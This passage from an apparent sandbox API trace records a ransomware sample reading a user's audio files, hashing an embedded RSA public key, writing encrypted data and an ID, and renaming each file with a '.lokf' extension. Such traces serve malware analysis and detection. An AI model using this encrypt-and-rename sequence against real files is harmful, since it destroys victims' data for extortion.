Flags=0x0, Size=0x108) returned 0x32453f0 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85998 | out: hHeap=0x660000) returned 1 [0059.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.861] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859c8 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859b0 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85980 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85968 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c885f8 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.862] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x12b98, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x12b98, lpOverlapped=0x0) returned 1 [0059.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.862] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12b9d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.862] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.862] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.862] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.862] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.862] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.862] CloseHandle (hObject=0x5cc) returned 1 [0059.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.864] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.864] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\nKN_va3f4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\nkn_va3f4.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\nKN_va3f4.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\nkn_va3f4.mp3.lokf")) returned 1 [0059.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.864] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0059.865] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542f48e0, ftCreationTime.dwHighDateTime=0x1d4d179, ftLastAccessTime.dwLowDateTime=0x4fbf03f0, ftLastAccessTime.dwHighDateTime=0x1d4c859, ftLastWriteTime.dwLowDateTime=0x4fbf03f0, ftLastWriteTime.dwHighDateTime=0x1d4c859, nFileSizeHigh=0x0, nFileSizeLow=0x71d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ohsb8tUwwTI.mp3", cAlternateFileName="OHSB8T~1.MP3")) returned 1 [0059.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0059.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.865] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\ohsb8tUwwTI.mp3") returned=".mp3" [0059.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\ohsb8tUwwTI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\ohsb8tuwwti.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.865] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=29143) returned 1 [0059.866] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.868] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x71b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.868] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.869] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.869] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.869] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.869] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x71d7, lpOverlapped=0x0) returned 1 [0059.869] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.869] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.869] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.869] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.869] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.870] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.870] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.870] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.870] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.870] GetLastError () returned 0x0 [0059.870] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.870] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.870] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.870] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.870] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.870] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.870] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x71e0) returned 0x9c88ae8 [0059.870] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.870] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c885f8 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85968 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88640 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85980 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859b0 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859c8 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.871] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.871] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.871] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x71d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.871] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.871] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.871] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.871] CloseHandle (hObject=0x5cc) returned 1 [0059.872] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.872] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.872] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\ohsb8tUwwTI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\ohsb8tuwwti.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\ohsb8tUwwTI.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\ohsb8tuwwti.mp3.lokf")) returned 1 [0059.875] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39b2e350, ftCreationTime.dwHighDateTime=0x1d4d54d, ftLastAccessTime.dwLowDateTime=0x6115bc80, ftLastAccessTime.dwHighDateTime=0x1d4c61e, ftLastWriteTime.dwLowDateTime=0x6115bc80, ftLastWriteTime.dwHighDateTime=0x1d4c61e, nFileSizeHigh=0x0, nFileSizeLow=0x17165, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w_gaxxrjB.wav", cAlternateFileName="W_GAXX~1.WAV")) returned 1 [0059.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0059.875] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\w_gaxxrjB.wav") returned=".wav" [0059.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\w_gaxxrjB.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\w_gaxxrjb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.875] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=94565) returned 1 [0059.875] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.877] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1713f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.877] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.878] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x17165, lpOverlapped=0x0) returned 1 [0059.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.879] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.880] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.880] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.880] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.880] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.880] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.880] GetLastError () returned 0x0 [0059.880] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.880] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.880] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.880] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.880] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.880] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.880] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.880] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.881] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17165, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.881] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.881] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.881] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.881] CloseHandle (hObject=0x5cc) returned 1 [0059.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.882] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\w_gaxxrjB.wav" (normalized: "c:\\users\\5p5nrgjn0js 